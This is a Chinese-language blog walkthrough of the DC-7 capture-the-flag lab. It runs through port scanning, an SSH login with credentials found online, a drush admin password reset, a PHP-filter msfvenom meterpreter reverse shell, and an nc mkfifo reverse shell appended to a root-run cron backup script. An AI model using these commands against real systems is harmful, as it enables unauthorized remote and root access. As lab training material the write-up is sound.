这周开始上课了,没法每日更新了,只能周末抽时间发,,,
那么进入正题
老规矩先搜索主机的地址
arp-scan -l
用nmap扫描端口和信息
nmap -sS -A -p 1-65535 192.168.75.140
开启了80端口,访问一下看看
emmm,为啥这么熟悉,。,。
使用之前的方法攻击Drupal,用msf测试失败。。。。
总觉得哪里和原先的不一样
挂上SSR去谷歌搜一波看看
!!!
配置文件?账号密码?
能不能登录后台?
SSH呢,奇怪的操作增加了
奇怪的操作果然增加了
查看当前目录下的文件,backups里面有两个加密文件,不可利用,查看mbox文件,发现是一个计划任务:自动备份数据库的执行情况,调用的脚本是/opt/scripts/backups.sh,是root权限执行的。
看看权限和内容
drush和gpg是什么东西?
其中drush是专门用来管理Drupal站点的shell,可以用来修改密码
可以修改admin账号的密码,这里要进入/var/www/html目录下才有权限执行该命令,这里修改密码为123465,提示success即修改密码成功。
登录成功
在Content中新建一个Basic page,然后在Title输入页面的名称,在Body中放入反弹shell的PHP代码,Text format的位置选择PHP code。但是从下图中可以看到Text format里面没有PHP code选项。这些都弄好了之后,在kali上监听端口,最后点击Preview按钮。
不过这个貌似被移除了
可以通过手动安装。选择URL并点击install
URL:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
随后在Content中添加webshell.php,点击Content > Add content > Basic page,先将Text format修改为PHP code,再写入反弹shell
可以直接msfvenom生成一个反弹shell代码
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.75.129 LPORT=4444 R > DC7_shell.php
复制反弹shell代码到Body里,Title自定义,完了之后放着别动,先使用metasploit监听端口,然后点击Preview
msfconsole
use exploit/multi/handler
set lhost 192.168.75.129
set lport 4444
set payload php/meterpreter/reverse_tcp
run
点击Preview后反弹成功,接着进入交互shell
shell
python -c "import pty;pty.spawn('/bin/bash')"
我们使用Drupal反弹回来的shell用户是www-data,所以接下来就是将反弹shell的代码附加到backups.sh脚本中(因为计划任务是root权限执行的,反弹回来的shell也会是root用户)
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.75.129 1234 >/tmp/f" >> backups.sh
然后在kali中监听相应端口,等待计划任务的执行,执行后便获得rootshell,接着进入交互shell
nc -lvnp 1234
shell
python -c "import pty;pty.spawn('/bin/bash')"
拿下flag
评论 (0)